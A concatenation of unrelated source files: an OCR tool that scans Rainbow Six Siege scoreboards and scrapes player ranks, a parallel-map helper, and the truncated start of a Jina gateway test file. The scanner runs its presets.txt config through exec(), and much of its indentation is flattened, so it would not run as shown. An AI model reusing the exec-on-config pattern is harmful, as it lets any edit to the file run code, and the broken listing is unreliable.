0x00,0x00,0x40,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x40,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x3f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x7f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x80,0x7f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,0x00,
0xfe,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x00,
0x00,0xfe,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
0x00,0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x04,0x00,0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x06,0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x02,0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x03,0x00,0x00,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x80,0x01,0x00,0x00,0xf0,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0xe0,0x1f,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0xc0,0x3f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0xc0,0x3f,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x80,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x00,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0xfe,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,
0xfe,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,
0x00,0xfc,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,
0x00,0x00,0xf8,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x03,0x00,
0x00,0x00,0x00,0xf0,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x01,
0x00,0x00,0x00,0x00,0xe0,0x3f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,
0x00,0x00,0x00,0x00,0x00,0xc0,0x7f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x00,0x00,0x00,0x00,0x00,0x80,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x38,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x1e,0x00,0x00,0x00,0x00,0x00,0x00,0xfe,0x07,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x0f,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0xf0,0x3f,0x00,0x00,
0x00,0x00,0x00,0x00,0xe0,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xe0,0x7f,0x00,
0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0xff,
0x01,0x00,0x00,0x00,0x00,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xff,0x07,0x00,0x00,0x00,0x00,0x80,0x1f,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xfc,0x3f,0x00,0x00,0x00,0x00,0xf0,0x07,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0xf0,0xff,0x01,0x00,0x00,0x00,0xfe,0x03,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0xc0,0xff,0x0f,0x00,0x00,0xe0,0xff,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0xfe,0xff,0x01,0x00,0xff,0x1f,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0xff,0xff,0xff,0xff,0x07,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0xff,0xff,0xff,0xff,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xfc,0xff,0xff,0x0f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0x7f,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};'
}
# Class for my own loading spinner
class my_rotating_icon(Canvas):
def __init__(self, master, size=50, speed=1, thickness=5, amount=3):
Canvas.__init__(self, master=master, width=2*size + (thickness*3.5) , height=2*size + (thickness*3.5))
self.amount = amount
self.speed = speed
self.a = []
self.b = []
self.start = 0
self.extent = 360/self.amount/2
self.thickness = thickness
self.size=size
self.x = size + (thickness*2)
self.y = size + (thickness*2)
for i in range(self.amount):
self.b.append(360/self.amount*i)
self.a.append(self.create_arc(self.x-self.size-self.thickness, self.y-self.size-self.thickness, self.x+self.size+self.thickness, self.y+self.size+self.thickness, fill="black", start=self.b[i], extent=self.extent))
self.create_oval(self.x-self.size, self.y-self.size, self.x+self.size, self.y+self.size, width=2, fill=self["bg"], outline="")
self.rotate()
def rotate(self):
self.start = self.start + 1
for i in range(self.amount):
self.itemconfig(self.a[i], start=self.start+self.b[i])
self.after(self.speed, self.rotate)
# Handles the presets.txt file
class presets_txt:
def __init__(self):
self.path()
return
    # Builds the path to the presets.txt file (same folder as the program)
def path(self):
self.directory_path = os.path.dirname(os.path.abspath(__file__))
self.file_path = self.directory_path + "\\presets.txt"
return self.file_path
    # Creates a new presets.txt file with default values
def create_new(self):
        self.path()
with open(file=self.file_path, mode="w") as self.file:
            self.file.write("#In this file the settings for the R6S Scan program are captured.\n")
            self.file.write("#Everything that isn't commented out with a # will be executed with Python and may lead to errors if it isn't valid Python.\n")
            self.file.write("#You can restore the default presets.txt with the program by pressing the Explanation button and choosing the appropriate option afterwards, ")
            self.file.write("or by deleting this file and starting the program afterwards.\n")
            self.file.write("#If you want to use '\\' instead of '/' in your paths you will have to use two ('\\\\') instead of one ('\\'), otherwise Python will not recognize it.\n\n")
            self.file.write("#Note that the tesseract software seems to have difficulties with paths that contain letters like ä,ö,ü,á,à,...\n")
            self.file.write("#If something isn't working and you tried everything else, try to rename the path.\n\n")
            self.file.write("#The default directory for the screenshots (with a '/' or '\\\\' at the end):\n")
            self.file.write("global default_dir\n")
            self.file.write("default_dir = \"%USERPROFILE%/Videos/\"\n\n")
            self.file.write("#tesseract.exe location:\n")
            self.file.write("global tess_loc\n")
            self.file.write("tess_loc = \"%ProgramFiles%/Tesseract-OCR/tesseract.exe\"\n\n")
            self.file.write("#Start the scanning process immediately after starting the program (either True or False and without \"):\n")
            self.file.write("global auto_start\n")
            self.file.write("auto_start = False")
return
    #Reads the presets.txt file and loads its variables
def read_n_exec(self):
global default_dir
global tess_loc
try:
self.path()
with open(file=self.file_path, mode="r") as self.file:
self.file_content = self.file.read()
exec (self.file_content)
except FileNotFoundError:
self.create_new()
self.path()
with open(file=self.file_path, mode="r") as self.file:
self.file_content = self.file.read()
exec (self.file_content)
default_dir = environmental_var_or_not(default_dir)
tess_loc = environmental_var_or_not(tess_loc)
return
#Tooltips
class CreateToolTip(object):
'''
create a tooltip for a given widget
'''
def __init__(self, widget, text='widget info'):
self.widget = widget
#self.text = tk.StringVar()
#self.text.set(text)
        self.text = text
        self.tw = None
        self.widget.bind("<Enter>", self.enter)
        self.widget.bind("<Leave>", self.close)
def enter(self, event=None):
x = y = 0
x, y, cx, cy = self.widget.bbox("insert")
x += self.widget.winfo_rootx() + 25
y += self.widget.winfo_rooty() + 20
# creates a toplevel window
self.tw = tk.Toplevel(self.widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
self.tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(self.tw,
#textvariable=self.text,
text=get_rank(self.text.get()),
justify='left',
background='yellow', relief='solid', borderwidth=1,
font=("times", "8", "normal"))
label.pack(ipadx=1)
def close(self, event=None):
if self.tw:
self.tw.destroy()
#Checks whether the path starts with an environment variable and returns it with the variable expanded
def environmental_var_or_not(path):
no_environmental = path
path = path[::-1]
first_part = os.path.split(path)[1]
rest = os.path.split(path)[0]
rest = rest[::-1]
first_part = first_part[::-1]
if first_part[0] == "%" and first_part[-1] == "%":
first_part = first_part[1:]
first_part = first_part[:-1]
try:
final_path = os.environ.get(first_part) + "/" + rest
except TypeError:
final_path = no_environmental
else:
final_path = no_environmental
return final_path
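# Worked example (for illustration only): with USERPROFILE set to C:\Users\Jane,
# environmental_var_or_not("%USERPROFILE%/Videos/") returns "C:\Users\Jane/Videos/".
# Paths that do not start with a %VARIABLE% component are returned unchanged.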
#Open the file explorer and choose a file
def choose_file():
global label1
global Pic
#Pic = tk.filedialog.askopenfilename(title = "Select Image", filetypes = (("png files","*.png"),("all files","*.*")))
var = tk.filedialog.askopenfilename(title = "Select Image", filetypes = (("png files","*.png"),("jpg files","*.jpg"),("gif files","*.gif"),("all files","*")))
if var != "":
test_Pic.set(var)
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
create_img_and_tesseract(test_Pic.get())
show_image()
return
#Tkinter callback function: opens the tracker profile of the given player name
def callback(name):
#webbrowser.open_new(url)
webbrowser.open_new("https://r6.tracker.network/profile/pc/" + name)
#Open all websites
def open_all(urls):
for name in urls:
webbrowser.open_new(name)
return
#Window handle of R6S
def windowEnumerationHandler(hwnd, top_windows):
top_windows.append((hwnd, win32gui.GetWindowText(hwnd)))
#Makes R6S the active window
def rainbow_top_window():
if __name__ == "__main__":
results = []
top_windows = []
win32gui.EnumWindows(windowEnumerationHandler, top_windows)
for i in top_windows:
if "rainbow" in i[1].lower():
results.append(i)
win32gui.ShowWindow(i[0],3)
break
#Automatic screenshot - not finished
def auto_screenshot():
rainbow_top_window()
time.sleep(1)
pyautogui.hotkey("alt", "enter")
time.sleep(3)
screenshot = ImageGrab.grab()
pyautogui.hotkey("alt", "enter")
time.sleep(3)
im1_np = np.array(screenshot)
im2 = cv2.cvtColor(im1_np, cv2.COLOR_BGR2RGB)
return im2
#Find the newest screenshot file name (GeForce Experience)
def sort_and_reverse(directory):
list_of_files = []
for i in ('*.gif', '*.png', '*.jpg'):
list_of_files.extend(glob.glob(directory + i))
try:
last_file = max(list_of_files, key=os.path.getctime)
return last_file
except ValueError:
return
#Opens the screenshot, crops it, reads out the text and creates the links to the player profiles
def create_img_and_tesseract(pic_dir):
global tk_img
global tk_img2
global new_output
global new_output_att
global new_output_def
global out_url
global out_att_url
global out_def_url
try:
        #Crop the relevant section
srcPic = cv2.imread(pic_dir, cv2.IMREAD_COLOR)
#srcPic.save("test.png")
height = np.size(srcPic, 0)
width = np.size(srcPic, 1)
y1 = round(450/1440*height)
y2 = round(1100/1440*height)
x1 = round(620/2560*width)
x2 = round(1200/2560*width)
att_pic = srcPic[y1:round(760/1440*height), x1:x2]
att_pic = cv2.bitwise_not(att_pic)
att_pic = Image.fromarray(att_pic, 'RGB')
def_pic = srcPic[round(790/1440*height):y2, x1:x2]
def_pic = cv2.bitwise_not(def_pic)
def_pic = Image.fromarray(def_pic, 'RGB')
srcPic = srcPic[y1:y2, x1:x2]
tk_img = srcPic
srcPic = cv2.bitwise_not(srcPic)
        #Text recognition
pytesseract.pytesseract.tesseract_cmd = tess_loc
#TESSDATA_PREFIX = r"C:\Program Files\Tesseract-OCR"
#output = pytesseract.image_to_string(srcPic, lang=None)
output_att = pytesseract.image_to_string(att_pic, lang=None)
output_def = pytesseract.image_to_string(def_pic, lang=None)
        #Create the links
new_output_att = []
out_att_url = []
output_att = output_att.split("\n")
for name in output_att:
if name != "" and name != " ":
url = "https://r6.tracker.network/profile/pc/" + name
new_output_att.append(name)
out_att_url.append(url)
new_output_def = []
out_def_url = []
output_def = output_def.split("\n")
for name in output_def:
if name != "" and name != " ":
url = "https://r6.tracker.network/profile/pc/" + name
new_output_def.append(name)
out_def_url.append(url)
except IndexError:
pass
return
#Displays the scoreboard image
def show_image():
global check1_var
global tk_img
global tk_img2
global img_Label
global frame2
global main_window
try:
img_Label.destroy()
except NameError:
pass
if check1_var.get() == 0:
frame2.destroy()
frame2 = tk.Frame(master=main_window)
frame2.pack()
if check1_var.get() == 1:
try:
frame2.destroy()
frame2 = tk.Frame(master=main_window)
frame2.pack()
except NameError:
pass
try:
tk_img2 = cv2.resize(tk_img,(387,433))
b,g,r = cv2.split(tk_img2)
tk_img2 = cv2.merge((r,g,b))
#cv2.imshow("hi", tk_img2)
#cv2.waitKey(0)
tk_img2 = Image.fromarray(tk_img2)
tk_img2 = ImageTk.PhotoImage(image=tk_img2)
img_Label = tk.Label(master=frame2)
img_Label.pack()
img_Label.config(image=tk_img2)
except NameError:
img_Label = tk.Label(master=frame2)
img_Label.pack()
return
#Displays the links to the player profiles
def show_links(*args):
global tk_img
global tk_img2
global img_window
global img_Label
global new_output
global new_output_att
global new_output_def
global out_url
global out_att_url
global out_def_url
global check1_var
global labels_name
global labels_att
global labels_def
global bu3
global labels_mmr_var
global loading_icon
try:
        #destroy old widgets
for i in range(10):
try:
labels_att[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
try:
labels_def[i].destroy()
except(UnboundLocalError, NameError, IndexError):
pass
try:
labels_mmr[i].destroy()
except(UnboundLocalError, NameError, IndexError):
pass
try:
loading_icon[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
try:
labels_mmr_tooltips[i].destroy()
except (UnboundLocalError, NameError, IndexError):
pass
for i in range(len(labels_mmr_var_att)):
labels_mmr_var_att[i].set("")
for i in range(len(labels_mmr_var_def)):
labels_mmr_var_def[i].set("")
        #place the loading indicators
place_loading_icon()
        #start the text recognition
create_img_and_tesseract(test_Pic.get())
        #show the image
show_image()
place_loading_icon()
try:
bu3.destroy()
except (NameError):
pass
        #create and display the links
labels_name = []
labels_att = []
labels_def = []
labels_mmr = []
labels_mmr_tooltips = []
loading_icon = []
if 1==1:
label_name = tk.Label(master=frame1, text="Name")
label_name.grid(row=3, column=0, sticky=tk.E, padx=20)
label_mmr = tk.Label(master=frame1, text="MMR")
label_mmr.grid(row=3, column=1, sticky=tk.W, padx=20)
t1 = threading.Thread(target=set_mmr_var)
t1.start()
att_binding = []
for i in range(len(new_output_att)):
try:
if new_output_att[i] != "":
labels_att.append(tk.Label(master=frame1, text=new_output_att[i], fg="#0066cc", cursor="hand2"))
labels_att[i].grid(row=i+4, column=0, sticky=tk.E, padx=20)
att_binding.append(labels_att[i]["text"])
labels_mmr.append(tk.Label(master=frame1, textvariable=labels_mmr_var_att[i]))
labels_mmr[i].grid(row=i+4, column=1, sticky=tk.W, padx=20)
labels_mmr_tooltips.append(CreateToolTip(labels_mmr[i], labels_mmr_var_att[i]))
except IndexError:
pass
def_binding = []
for i in range(len(new_output_def)):
try:
if new_output_def[i] != "":
labels_def.append(tk.Label(master=frame1, text=new_output_def[i], fg="#CC6600", cursor="hand2"))
labels_def[i].grid(row=i+9, column=0, sticky=tk.E, padx=20)
def_binding.append(labels_def[i]["text"])
labels_mmr.append(tk.Label(master=frame1, textvariable=labels_mmr_var_def[i]))
labels_mmr[i+len(new_output_att)].grid(row=i+9, column=1, sticky=tk.W, padx=20)
labels_mmr_tooltips.append(CreateToolTip(labels_mmr[i+len(new_output_att)], labels_mmr_var_def[i]))
except NameError:
pass
        #bind a click handler to each attacker and defender name label
        for idx in range(5):
            try:
                labels_att[idx].bind("<Button-1>", lambda e, i=idx: callback(att_binding[i]))
            except IndexError:
                pass
        for idx in range(5):
            try:
                labels_def[idx].bind("<Button-1>", lambda e, i=idx: callback(def_binding[i]))
            except IndexError:
                pass
        #Open all
bu3 = tk.Button(master = frame1, text="Open all")
        bu3.bind("<Button-1>", lambda e: open_all(out_att_url + out_def_url))
bu3.grid(row=i+11, column=0, columnspan=2)
return
    except NameError:
pass
#Explains the program in a new window (not finished)
def explain():
explain_window = tk.Toplevel()
explain_window.title("How does it work?")
#explain_window.geometry('500x200')
l_header = tk.Label(master=explain_window, text="\nThis is the R6S Scoreboard Scanner.", font="Calibri 14", fg="red").pack()
    l_text = tk.Label(master=explain_window, font="Calibri 12", borderwidth=20, wraplength=560, text="Its purpose is to scan a screenshot of a R6S scoreboard and give out links to every player's profile. The stats are displayed on the https://r6.tracker.network/ website. \n\nBy default, the newest .png file in the default directory, which can be defined in the presets.txt, is chosen for scanning. You can choose another image to be scanned after the program has started.\n\nThe program uses the Tesseract engine, which you can download using the button below, for scanning the images. The path to the tesseract.exe has to be defined in the presets.txt as well. \n\nIf the scanner isn't working anymore because the presets.txt has been changed, use the button below to create a new presets.txt with default settings.")
l_text.pack()
    bu_presets = tk.Button(master=explain_window, font="Calibri 11", text="create new presets.txt", command=lambda: [presets_txt.create_new(), presets_txt.read_n_exec()])
bu_presets.pack()
    bu_link = tk.Button(master=explain_window, text="tesseract ocr website", command=lambda: webbrowser.open_new("https://digi.bib.uni-mannheim.de/tesseract/"))
bu_link.pack()
l_space = tk.Label(master=explain_window, text="\n").pack()
return
#Reads out the current MMR value of a player
def read_out_website(link):
website = requests.get(link)
content = repr(website.text)
search_term = '<div class="trn-text--dimmed" style="font-size: 2rem;">'
search_term_length = len(search_term)
search_term_position = content.find(search_term)
var_margin = 5
MMR_string = content[search_term_position+search_term_length:search_term_position+search_term_length+var_margin]
    MMR_string = str(re.sub(r"\D", "", MMR_string))
return MMR_string
#Set the MMR variables
def set_mmr_var():
global labels_mmr_var
global labels_mmr_var_att
global labels_mmr_var_def
global out_url
global out_att_url
global out_def_url
    for i in range(5):
        try:
            mmr = read_out_website(out_att_url[i])
            if mmr != "8":
                labels_mmr_var_att[i].set(mmr)
            else:
                labels_mmr_var_att[i].set("Error occurred")
        except IndexError:
            pass
    for i in range(5):
        try:
            mmr = read_out_website(out_def_url[i])
            if mmr != "8":
                labels_mmr_var_def[i].set(mmr)
            else:
                labels_mmr_var_def[i].set("Error occurred")
        except IndexError:
            pass
return
#Place the loading indicators
def place_loading_icon():
global loading_icon
global new_output_att
global new_output_def
loading_icon = []
for i in range(len(new_output_att)):
#loading_icon.append(Spinner1(frame1, size=24))
#loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
#loading_icon[i].grid(row=i+4, column=1, sticky=tk.W, padx=27)
loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
loading_icon[i].grid(row=i+4, column=1, sticky=tk.W, padx=27)
for i in range(len(new_output_def)):
loading_icon.append(my_rotating_icon(frame1, size=10, speed=6, thickness=2, amount=2))
loading_icon[i+len(new_output_att)].grid(row=i+9, column=1, sticky=tk.W, padx=27)
return
#Delete the selected image
def delete_img():
os.remove(test_Pic.get())
test_Pic.set(sort_and_reverse(dir))
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
create_img_and_tesseract(test_Pic.get())
show_image()
#Tesseract not installed
def no_tesseract():
global tess_loc
pytesseract.pytesseract.tesseract_cmd = tess_loc
test_img = Image.new('RGB', (60, 30), color = 'red')
try:
test = pytesseract.image_to_string(test_img, lang=None)
except pytesseract.pytesseract.TesseractNotFoundError:
w = tk.Tk()
text = tess_loc + " is not installed or it's not in your path!"
l = tk.Label(text=text)
l.pack(padx=10, pady=10)
bu = tk.Button(master=w, text="Download tesseract for Windows", command=lambda: webbrowser.open_new("https://digi.bib.uni-mannheim.de/tesseract/"))
bu.pack(padx=10, pady=10)
w.mainloop()
sys.exit(0)
#Determine the rank name from an MMR value
def get_rank(rank):
for i in range(len(ranks1)):
try:
if float(rank) <= float(ranks1[i]):
return ranks2[ranks1[i]]
except ValueError:
pass
return "DIAMOND"
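# Worked example (for illustration only): get_rank("2550") fails the checks up to
# 2499, matches 2699 and returns 'GOLD IV'; any value above 4499 (or a
# non-numeric string) falls through and returns the "DIAMOND" fallback.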
#-----------------------------
#Code that is actually executed
#-------------------------------------------
#Set variables
presets_txt = presets_txt()
presets_txt.read_n_exec()
dir = default_dir
ranks1 = [1399, 1499, 1599, 1699, 1799, 1899, 1999, 2099, 2199, 2299, 2399, 2499, 2699, 2899, 3099, 3299, 3699, 4099, 4499]
ranks2 = {1399: 'COPPER IV', 1499: 'COPPER III', 1599: 'COPPER II', 1699: 'COPPER I', 1799: 'BRONZE IV', 1899: 'BRONZE III', 1999: 'BRONZE II', 2099: 'BRONZE I', 2199: 'SILVER IV', 2299: 'SILVER III', 2399: 'SILVER II', 2499: 'SILVER I', 2699: 'GOLD IV', 2899: 'GOLD III', 3099: 'GOLD II', 3299: 'GOLD I', 3699: 'PLATINUM III', 4099: 'PLATINUM II', 4499: 'PLATINUM I'}
no_tesseract()
#Tkinter window and widgets
main_window = tk.Tk()
main_window.title("R6S Scoreboard Scanner")
#Dynamic variables
test_Pic = tk.StringVar()
test_Pic_kurz = tk.StringVar()
test_Pic.set(sort_and_reverse(dir))
test_Pic_kurz.set(ntpath.basename(test_Pic.get()))
labels_mmr_var = []
for i in range(10):
labels_mmr_var.append(tk.StringVar())
labels_mmr_var_att = []
for i in range(5):
labels_mmr_var_att.append(tk.StringVar())
labels_mmr_var_def = []
for i in range(5,10):
labels_mmr_var_def.append(tk.StringVar())
create_img_and_tesseract(sort_and_reverse(dir))
frame1 = tk.Frame(master=main_window)
frame1.pack(side=tk.LEFT)
label1 = tk.Label(master=frame1, bd=10, font="Segoe 10", fg="blue", cursor="hand2", textvariable=test_Pic_kurz)
label1.grid(row=0, column=0, columnspan=2)
label1.bind("<Button-1>", lambda e: choose_file())
bu_del = tk.Button(master=frame1, text="Delete", command=delete_img)
bu_del.grid(row=0, column=2, sticky=tk.W, padx=20)
check1_var = tk.IntVar()
check1 = tk.Checkbutton(master=frame1, text="Show Scoreboard", variable=check1_var, font="Segoe 10")
check1.grid(row=1, column=0, columnspan=2)
check1.select()
bu1 = tk.Button(master=frame1, text="Run", command=show_links)
bu1.bind("<Return>", show_links)
bu1.focus_set()
bu1.grid(row=2, column=0, sticky=tk.E, padx=20)
bu2 = tk.Button(master=frame1, text="Explanation", command=explain)
bu2.grid(row=2, column=1, sticky=tk.W, padx=20)
frame2 = tk.Frame(master=main_window)
frame2.pack(side=tk.RIGHT)
show_image()
if auto_start == True:
show_links()
main_window.mainloop()
|
fast_map.py
|
''' It's my first python package.
You may notice it's not very presentable for public release,
but it seems to do the job. '''
import multiprocessing as mp
# from multiprocessing.dummy import Pool as ThreadPool
from concurrent.futures import ThreadPoolExecutor
import math
# from itertools import repeat
from functools import partial
from threading import Thread
import time
# import psutil
def process_chunk(proc_id, f, threads_count, task_queue, result_queue):
# print('start proc id', proc_id, ' cpu core=',psutil.Process().cpu_num())
futures = []
def on_completed(future, index):
res = future.result()
# print('on_completed, res=', res)
result_queue.put((index, res))
with ThreadPoolExecutor(max_workers=threads_count) as executor:
while True:
i, item = task_queue.get()
task_queue.task_done()
            if item is None:
break
future = executor.submit(f, *item)
future.add_done_callback(partial(on_completed, index=i))
# print('end proc id', proc_id, ' cpu core=', psutil.Process().cpu_num())
def calculate_procs_and_threads_per_process(threads_limit, tasks_count):
''' threads_limit = total threads limit (e.g. if equal to 8 then on a 4 core
cpu, 2 threads will be spawned in each process) '''
procs_count = mp.cpu_count()
if tasks_count < procs_count:
procs_count = tasks_count
    if threads_limit and threads_limit < procs_count:
        procs_count = threads_limit
# chunk to be processed by a single process
chunk_size = math.ceil(tasks_count / procs_count)
threads_pp = chunk_size # threads per process
if threads_limit:
threads_pp = min(threads_pp, math.ceil(threads_limit/procs_count))
# print("threads_pp =", threads_pp)
return procs_count, threads_pp
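# Worked example (for illustration only): with threads_limit=8 on a 4-core machine
# and 100 tasks, procs_count stays 4 and threads_pp = min(ceil(100/4), ceil(8/4)) = 2,
# i.e. 4 processes with 2 threads each, as described in the docstring above.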
def fast_map(f, *v, threads_limit=None, forced_procs_count=None):
''' threads_limit = total threads limit (e.g. if equal to 8 then on a 4 core
cpu, 2 threads will be spawned in each process) '''
def enqueuer(queues, values, none_count):
for i, val in enumerate(zip(*values)):
# print('enqueue', i, val)
queues[i % len(queues)].put((i,val))
for q in queues:
q.put((None,None))
tasks_count = len(v[0])
procs_count, threads_pp = calculate_procs_and_threads_per_process( threads_limit, tasks_count )
    # forced_procs_count is just for testing (not intended to be a feature)
if forced_procs_count:
procs_count = forced_procs_count
task_queues = [mp.JoinableQueue() for _ in range(procs_count)] # multiple queues for the sake of even distribution
result_queue = mp.Queue()
procs = []
for i in range(procs_count):
p = mp.Process(target=process_chunk, args=[i, f, threads_pp, task_queues[i], result_queue])
procs.append(p)
p.start()
Thread(target=enqueuer, daemon=True, args=[task_queues, v, procs_count]).start()
expected_index = 0
ordered_results = {} # key=index val=result
while True:
alive_procs = [p for p in procs if p.is_alive()]
if result_queue.empty() and len(alive_procs) == 0:
return
while not result_queue.empty():
i, res = result_queue.get()
if i != expected_index:
ordered_results[i] = res
continue
yield res
expected_index += 1
            while expected_index in ordered_results:
yield ordered_results.pop(expected_index)
expected_index += 1
if expected_index == tasks_count:
return
if __name__ == '__main__':
pass
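    # Minimal usage sketch (an assumption, not part of the original module):
    # map math.sqrt over a list in parallel, capping the total thread count at 4.
    # A module-level function is used so it pickles cleanly across processes.
    for result in fast_map(math.sqrt, [1, 4, 9, 16], threads_limit=4):
        print(result)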
|
test_clients_gateways.py
|
import asyncio
import copy
import multiprocessing
import time
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.types.request.data import DataRequest
@pytest.fixture
def linear_graph_dict():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1'],
'pod1': ['pod2'],
'pod2': ['pod3'],
'pod3': ['end-gateway'],
}
@pytest.fixture
def bifurcation_graph_dict():
return {
'start-gateway': ['pod0', 'pod4', 'pod6'],
'pod0': ['pod1', 'pod2'],
'pod1': [], # hanging_pod
'pod2': ['pod3'],
'pod4': ['pod5'],
'pod5': ['end-gateway'],
'pod3': ['pod5'],
'pod6': [], # hanging_pod
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_gateway():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['merger'],
'merger': ['end-gateway'],
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_last_pod():
return {
'start-gateway': ['pod0'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['merger'],
'merger': ['pod_last'],
'pod_last': ['end-gateway'],
}
@pytest.fixture
def complete_graph_dict():
return {
'start-gateway': ['pod0', 'pod4', 'pod6'],
'pod0': ['pod1', 'pod2'],
'pod1': ['merger'],
'pod2': ['pod3'],
'pod4': ['pod5'],
'merger': ['pod_last'],
'pod5': ['merger'],
'pod3': ['merger'],
'pod6': [], # hanging_pod
'pod_last': ['end-gateway'],
}
class DummyNoDocAccessMockConnectionPool:
def send_requests_once(
self, requests, pod: str, head: bool, endpoint: str = None
) -> asyncio.Task:
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
if requests[0].is_decompressed:
return (
DataRequest(request=requests[0].proto.SerializePartialToString()),
{},
)
else:
return DataRequest(request=requests[0].buffer), {}
return asyncio.create_task(task_wrapper())
class DummyMockConnectionPool:
def send_requests_once(
self, requests, pod: str, head: bool, endpoint: str = None
) -> asyncio.Task:
assert head
request = requests[0]
response_msg = copy.deepcopy(request)
new_docs = DocumentArray()
docs = request.docs
for doc in docs:
